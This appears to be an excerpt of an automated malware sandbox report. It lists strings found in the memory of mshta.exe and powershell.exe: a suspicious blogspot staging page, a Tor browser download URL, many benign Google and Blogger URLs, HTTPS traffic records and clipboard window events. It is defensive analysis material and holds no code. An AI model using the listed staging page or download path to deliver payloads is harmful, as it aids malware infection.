              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/intent/tweet?text=
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogblog.com;
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/?tab=jj
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308484243.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221567445.0000000003B49000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264173240.00000000057E2000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$
              Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlH
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
              Source: mshta.exe, 00000006.00000003.2241524951.000000000306E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758
              Source: mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758QV
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2264656702.0000000005790000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a384-
              Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/feeds/9116518222795791100/posts/default
              Source: mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/adspersonalization
              Source: mshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/blogspot-cookies
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/buzz
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/contentpolicy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/devapi
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/devforum
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/discuss
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/helpcenter
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/privacy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/terms
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/tutorials
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspng
              Source: mshta.exe, 00000006.00000003.2264609291.00000000057CD000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngom%2Fp%2Fst2222.ht
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngv
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngx
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=penci
              Source: mshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/rpc_relay.html
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=em
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=fa
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=tw
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.js
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsT
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsn
              Source: mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3767
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js06G
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssG
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssEV
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQV
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.js
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jsY
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jseflate
              Source: mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/unvisited-link-
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsZ
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsal
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsttps%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/s
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/CO
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.css
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.cssM
              Source: mshta.exe, 00000006.00000002.2309877256.00000000080A2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.cssg
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/css/maia.cssgspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264365340.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
              Source: mshta.exe, 00000006.00000003.2261840668.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.TCoB7ee77HA.O/rt=j/m=q_d
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.1KF06_f2niE.L.X.O/m=qawd
              Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
              Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
              Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
              Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
              Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
              Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
              Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
              Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
              Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary:

              bar